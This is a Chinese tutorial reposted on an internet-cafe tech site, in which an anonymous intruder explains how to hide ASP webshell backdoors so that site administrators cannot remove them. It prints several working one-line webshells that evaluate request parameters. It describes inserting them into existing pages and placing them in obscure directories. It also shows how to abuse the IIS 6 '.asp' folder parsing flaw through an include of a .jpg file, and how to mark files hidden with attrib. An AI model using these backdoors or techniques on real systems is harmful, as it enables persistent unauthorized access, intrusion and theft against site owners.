天下网吧 >> 网吧天地 >> 网吧技术 >> 网吧软件 >> 正文

后门隐藏技术分析之My经验谈

2011-2-28不详佚名

   相信很多朋友们都有入侵留下的后门被删的情况吧,今天我写这篇文章就是教大家如何制作自己的隐藏后门,与管理员斗争到底````
    文章主要讲解两方面的后门隐藏技术,web or server…
    先说说webshell的隐藏吧:
    比较笨的方法就是找一些比较深或者比较隐蔽的地方放自己的ASP木马,这个就不用我说了吧。
    下面这些方法,只要大家利用好,做个隐藏的ASP后门是不成问题的。
    1.插马法:其实,我们可以直接把一句话插入已经存在的页面了,但是,问题出来了,像常用的:<%execute(request("a"))%> <%execute(request("value"))%> <%eval request("#")%> <%if request("cnxhacker")<>"" then Session("b")=request("cnxhacker")
    if Session("b")<>"" then execute Session("b")%> 等等,这些一句话一插进去的话,就会报错,一下就会被发现…其实,我们忽略了一个天天在用的S端:<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
    冰狐的一句话客户端,这个调用的是Javascript脚本,跟调用Vbscript不同,Javascript是运行在客户端的,也就上一HTML端,所以我们可以直接把他插入在页面中,而不报错。这样,就达到了隐藏后门的技术。(建议大家找个比较大的页面,随便插在</td>,</tr>,</body>这些标签后门都可以的)
    2.建立非标准目录:这个只要有CMDshell 就可以了,当然提权最好。直接在站点跟目录下建立个文件夹,DOS法:md adai 然后在拷贝自己的木马到这个目录下,比如木马在d:\web\wind.asp 就把他拷贝到d:\web\adai\wind.asp 这样,也可以起到隐藏作用。
    3.include调用法:知道最近出了个动易的ODAY么,就是利用03服务器的IIS解析的漏洞,我给大家讲解下,03服务器会对asp的文件进行解析,这样就可以达到我们隐藏后门的技术了,大家会经常看到:<!--#include file=”…/conn.asp”-->之类的代码吧,OK,咱们就利用这个方法来隐藏。先建立个普通的asp文件夹(记着,是文件夹),例如adai.asp,然后再在adai.asp里面建立个图片文件如adai.jpg。在里面插入一句话代码。然后在建立个文本文件如wind.txt,接着在wind.txt里插入:<!--#include file=”…/adai.jpg”-->。这样咱们在访问站点的wind.txt时,就是我们的一句话后门了,有些菜鸟可能会问。:<!--#include file=”…/adai.jpg”--> 是ASP的内容,怎么能在JPG里生效呢?我刚才不是说了么,03服务器的IIS会解析asp文件么。所以我们在访问adai.jpg时,他就误认为在访问wind.asp了。这种方法在隐藏方面也是很不错的,大家可以把adai.jpg放在别的目录里,记得更改下include file里的路径就可以了。
    如果怕被管理员发现adai.asp时,咱们可以把他隐藏起来啊 DOS下输入:attrib +H +S adai.asp
    OK,先说这么多…下次为大家讲解server隐藏后门技术!!
    文章写的不是很好,但大部分都是个人经验,相信对大家还是有帮助的。

本文来源:不详 作者:佚名

声明
声明:本站所发表的文章、评论及图片仅代表作者本人观点,与本站立场无关。文章是出于传递更多信息之目的。若有来源标注错误或侵犯了您的合法权益,请作者持权属证明与本网联系,我们将及时更正、删除,谢谢。 Email:support@txwb.com,系统开号,技术支持,服务联系微信:_WX_1_本站所有有注明来源为天下网吧或天下网吧论坛的原创作品,各位转载时请注明来源链接!
天下网吧·网吧天下
  • 本周热门
  • 本月热门
  • 阅读排行